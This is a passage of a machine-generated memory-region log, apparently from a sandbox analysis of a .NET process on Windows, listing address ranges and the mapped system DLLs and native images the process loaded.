"\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll") Region: id = 4922 start_va = 0x1d0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 4923 start_va = 0x76e80000 end_va = 0x76fdbfff monitored = 0 entry_point = 0x76ecba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 4924 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 4925 start_va = 0x75300000 end_va = 0x75302fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-xstate-l2-1-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-xstate-l2-1-0.dll") Region: id = 4926 start_va = 0x72b50000 end_va = 0x72bd8fff monitored = 1 entry_point = 0x72b51130 region_type = mapped_file name = "clrjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll") Region: id = 4927 start_va = 0x757f0000 end_va = 0x7587efff monitored = 0 entry_point = 0x757f3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 4928 start_va = 0x1f0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 4929 start_va = 0x280000 end_va = 0x28ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 4930 start_va = 0x2d0000 end_va = 0x30ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 4931 start_va = 0x280000 end_va = 0x28ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 4932 start_va = 0x280000 end_va = 0x28ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 4933 start_va = 0x290000 end_va = 0x29ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 4934 start_va = 0x6fec0000 end_va = 0x70914fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\2c3c912ea8f058f9d04c4650128feb3f\\system.ni.dll") Region: id = 4935 start_va = 0x6f6a0000 end_va = 0x6feb7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\31fae3290fad30c31c98651462d22724\\system.core.ni.dll") Region: id = 4936 start_va = 0x6e290000 end_va = 0x6f696fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.servicemodel.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.ServiceModel\\74d6cec37a30e1133f67258ce3ea5ea7\\System.ServiceModel.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.servicemodel\\74d6cec37a30e1133f67258ce3ea5ea7\\system.servicemodel.ni.dll") Region: id = 4937 start_va = 0x72840000 end_va = 0x72b44fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.identitymodel.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.IdentityModel\\c2ef5bc545b98a289f02d0b3eddbe280\\System.IdentityModel.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.identitymodel\\c2ef5bc545b98a289f02d0b3eddbe280\\system.identitymodel.ni.dll") Region: id = 4938 start_va = 0x72560000 end_va = 0x72832fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.runtime.serialization.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Runteb92aa12#\\274e43040c8a7a02ef1065db3283005a\\System.Runtime.Serialization.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.runteb92aa12#\\274e43040c8a7a02ef1065db3283005a\\system.runtime.serialization.ni.dll") Region: id = 4939 start_va = 0xb70000 end_va = 0xbfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 4940 start_va = 0xca0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 4941 start_va = 0x72dd0000 end_va = 0x72deffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "smdiagnostics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\SMDiagnostics\\dc67dcb4b2fb4a3853d458cab08561f0\\SMDiagnostics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\smdiagnostics\\dc67dcb4b2fb4a3853d458cab08561f0\\smdiagnostics.ni.dll") Region: id = 4942 start_va = 0x6db10000 end_va = 0x6e283fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\15af16d373cf0528cb74fc73d365fdbf\\system.xml.ni.dll") Region: id = 4943 start_va = 0x6da40000 end_va = 0x6db0bfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.servicemodel.internals.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Servd1dec626#\\7679b916bf64989f7e8559969b308da1\\System.ServiceModel.Internals.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.servd1dec626#\\7679b916bf64989f7e8559969b308da1\\system.servicemodel.internals.ni.dll") Region: id = 4944 start_va = 0x742b0000 end_va = 0x742c6fff monitored = 0 entry_point = 0x742b3573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 4945 start_va = 0x280000 end_va = 0x2bbfff monitored = 0 entry_point = 0x28128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 4946 start_va = 0x280000 end_va = 0x2bbfff monitored = 0 entry_point = 0x28128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 4947 start_va = 0x280000 end_va = 0x2bbfff monitored = 0 entry_point = 0x28128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 4948 start_va = 0x280000 end_va = 0x2bbfff monitored = 0 entry_point = 0x28128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 4949 start_va = 0x280000 end_va = 0x2bbfff monitored = 0 entry_point = 0x28128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 4950 start_va = 0x74270000 end_va = 0x742aafff monitored = 0 entry_point = 0x7427128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 4951 start_va = 0x72540000 end_va = 0x72552fff monitored = 1 entry_point = 0x7254d900 region_type = mapped_file name = "nlssorting.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\nlssorting.dll") Region: id = 4952 start_va = 0x49d0000 end_va = 0x4ca1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nlp" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\sortdefault.nlp" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\sortdefault.nlp") Region: id = 4953 start_va = 0x6d930000 end_va = 0x6da34fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.configuration.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\96f7edb07b12303f0ec2595c7f3778c7\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\96f7edb07b12303f0ec2595c7f3778c7\\system.configuration.ni.dll") Region: id = 4954 start_va = 0x75cb0000 end_va = 0x768f9fff monitored = 0 entry_point = 0x75d31601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 4955 start_va = 0x280000 end_va = 0x280fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 4956 start_va = 0x745e0000 end_va = 0x745eafff monitored = 0 entry_point = 0x745e1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 4957 start_va = 0x72520000 end_va = 0x72536fff monitored = 0 entry_point = 0x725235fa region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 4958 start_va = 0x290000 end_va = 0x29ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 4959 start_va = 0xfff50000 end_va = 0xfff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fff50000" filename = "" Region: id = 4960 start_va = 0xfff40000 end_va = 0xfff4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fff40000" filename = "" Region: id = 4961 start_va = 0x650000 end_va = 0x6b1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscorrc.dll") Region: id = 4962 start_va = 0x75610000 end_va = 0x75644fff monitored = 0 entry_point = 0x7561145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 4963 start_va = 0x76c10000 end_va = 0x76c15fff monitored = 0 entry_point = 0x76c11782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 4964 start_va = 0x744e0000 end_va = 0x7451bfff monitored = 0 entry_point = 0x744e145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 4965 start_va = 0x744d0000 end_va = 0x744d4fff monitored = 0 entry_point = 0x744d15df region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 4966 start_va = 0x744c0000 end_va = 0x744c5fff monitored = 0 entry_point = 0x744c1673 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll") Region: id = 4967 start_va = 0x74560000 end_va = 0x745a3fff monitored = 0 entry_point = 0x745763f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 4968 start_va = 0xce0000 end_va = 0xd9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 4969 start_va = 0x74540000 end_va = 0x7455bfff monitored = 0 entry_point = 0x7454a431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 4970 start_va = 0x74530000 end_va = 0x74536fff monitored = 0 entry_point = 0x7453128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 4971 start_va = 0x74430000 end_va = 0x74435fff monitored = 0 entry_point = 0x744314b2 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 4972 start_va = 0x743f0000 end_va = 0x74427fff monitored = 0 entry_point = 0x743f990e region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 4973 start_va = 0x6d0000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 4974 start_va = 0x2a0000 end_va = 0x2affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 4975 start_va = 0x2b0000 end_va = 0x2bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 4976 start_va = 0x2c0000 end_va = 0x2cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 4977 start_va = 0x310000 end_va = 0x31ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4978 start_va = 0x320000 end_va = 0x32ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 4979 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 4980 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 4981 start_va = 0x2a0000 end_va = 0x2affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 4985 start_va = 0x2a0000 end_va = 0x2affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 4986 start_va = 0x2a0000 end_va = 0x2affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 4987 start_va = 0x2a0000 end_va = 0x2affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 4988 start_va = 0x2a0000 end_va = 0x2affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 4989 start_va = 0x2b0000 end_va = 0x2bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 4990 start_va = 0x2a0000 end_va = 0x2affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 4991 start_va = 0x2b0000 end_va = 0x2bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 4992 start_va = 0x2a0000 end_va = 0x2affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 4993 start_va = 0x2a0000 end_va = 0x2affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 4994 start_va = 0x2a0000 end_va = 0x2affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 4995 start_va = 0x2a0000 end_va = 0x2affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 4996 start_va = 0x72510000 end_va = 0x7251cfff monitored = 0 entry_point = 0x72512012 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc6.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll") Region: id = 4997 start_va = 0x724f0000 end_va = 0x72501fff monitored = 0 entry_point = 0x724f3271 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 4998 start_va = 0x779b0000 end_va = 0x779b4fff monitored = 0 entry_point = 0x779b1438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 4999 start_va = 0x74360000 end_va = 0x743b1fff monitored = 0 entry_point = 0x743614be region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll") Region: id = 5000 start_va = 0x74340000 end_va = 0x74354fff monitored = 0 entry_point = 0x743412de region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll") Region: id = 5001 start_va = 0x74330000 end_va = 0x7433cfff monitored = 0 entry_point = 0x74331326 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll") Region: id = 5002 start_va = 0xea0000 end_va = 0xf5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 5005 start_va = 0x4590000 end_va = 0x45cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004590000" filename = "" Region: id = 5006 start_va = 0x4d50000 end_va = 0x4e4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 5007 start_va = 0x6d8d0000 end_va = 0x6d927fff monitored = 0 entry_point = 0x6d8d13b4 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 5008 start_va = 0xfffaa000 end_va = 0xfffacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fffaa000" filename = "" Region: id = 5009 start_va = 0x6d880000 end_va = 0x6d8cefff monitored = 0 entry_point = 0x6d881452 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\SysWOW64\\webio.dll" (normalized: "c:\\windows\\syswow64\\webio.dll") Region: id = 5010 start_va = 0xb70000 end_va = 0xbaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 5011 start_va = 0xbc0000 end_va = 0xbfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bc0000" filename = "" Region: id = 5012 start_va = 0x4ff0000 end_va = 0x50effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ff0000" filename = "" Region: id = 5013 start_va = 0xfffa7000 end_va = 0xfffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fffa7000" filename = "" Region: id = 5014 start_va = 0x724e0000 end_va = 0x724e7fff monitored = 0 entry_point = 0x724e34d3 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\SysWOW64\\credssp.dll" (normalized: "c:\\windows\\syswow64\\credssp.dll") Region: id = 5015 start_va = 0x4d00000 end_va = 0x4d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d00000" filename = "" Region: id = 5016 start_va = 0x4e50000 end_va = 0x4f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e50000" filename = "" Region: id = 5017 start_va = 0xfffa4000 end_va = 0xfffa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fffa4000" filename = "" Region: id = 5018 start_va = 0x50f0000 end_va = 0x51effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000050f0000" filename = "" Region: id = 5019 start_va = 0x4f80000 end_va = 0x4fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f80000" filename = "" Region: id = 5020 start_va = 0x5350000 end_va = 0x544ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005350000" filename = "" Region: id = 5021 start_va = 0xfffa1000 end_va = 0xfffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fffa1000" filename = "" Region: id = 5022 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 5023 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 5024 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 5025 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 5026 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 5027 start_va = 0x2a0000 end_va = 0x2a6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 5028 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 5029 start_va = 0x2a0000 end_va = 0x2a6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 5030 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 5031 start_va = 0x2a0000 end_va = 0x2a6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 5032 start_va = 0x2a0000 end_va = 0x2b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5033 start_va = 0x6d870000 end_va = 0x6d877fff monitored = 0 entry_point = 0x6d8710e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 5034 start_va = 0x6d830000 end_va = 0x6d86efff monitored = 0 entry_point = 0x6d832351 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 5035 start_va = 0x75650000 end_va = 0x75770fff monitored = 0 entry_point = 0x7565158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 5036 start_va = 0x76d70000 end_va = 0x76d7bfff monitored = 0 entry_point = 0x76d7238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 5049 start_va = 0x10e0000 end_va = 0x111ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010e0000" filename = "" Region: id = 5050 start_va = 0x1120000 end_va = 0x115ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 5051 start_va = 0x5220000 end_va = 0x525ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005220000" filename = "" Region: id = 5052 start_va = 0x5500000 end_va = 0x55fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005500000" filename = "" Region: id = 5053 start_va = 0xfff3a000 end_va = 0xfff3cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fff3a000" filename = "" Region: id = 5054 start_va = 0xfff3d000 end_va = 0xfff3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fff3d000" filename = "" Region: id = 5055 start_va = 0x6d690000 end_va = 0x6d827fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.csharp.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.CSharp\\f73f48afb5512225dedaee9c88ac5050\\Microsoft.CSharp.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.csharp\\f73f48afb5512225dedaee9c88ac5050\\microsoft.csharp.ni.dll") Region: id = 5056 start_va = 0x6d4e0000 end_va = 0x6d682fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.drawing.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\system.drawing.ni.dll") Region: id = 5057 start_va = 0x6c670000 end_va = 0x6d4d5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.windows.forms.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\system.windows.forms.ni.dll") Region: id = 5058 start_va = 0x6c4e0000 end_va = 0x6c66ffff monitored = 0 entry_point = 0x6c57d026 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll") Region: id = 5059 start_va = 0x5260000 end_va = 0x533ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005260000" filename = "" Region: id = 5060 start_va = 0x74440000 end_va = 0x744bffff monitored = 0 entry_point = 0x744537c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 5061 start_va = 0xc00000 end_va = 0xc8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 5062 start_va = 0x5600000 end_va = 0x56defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005600000" filename = "" Region: id = 5063 start_va = 0x1090000 end_va = 0x10cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001090000" filename = "" Region: id = 5064 start_va = 0x57e0000 end_va = 0x58dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000057e0000" filename = "" Region: id = 5065 start_va = 0xfff37000 end_va = 0xfff39fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fff37000" filename = "" Region: id = 5066 start_va = 0x5970000 end_va = 0x5a6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005970000" filename = "" Region: id = 5067 start_va = 0x6c470000 end_va = 0x6c4d4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.dynamic.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Dynamic\\b7ad5353ae4f44df28ce7ebc9a8a752a\\System.Dynamic.ni.dll" (normalized: 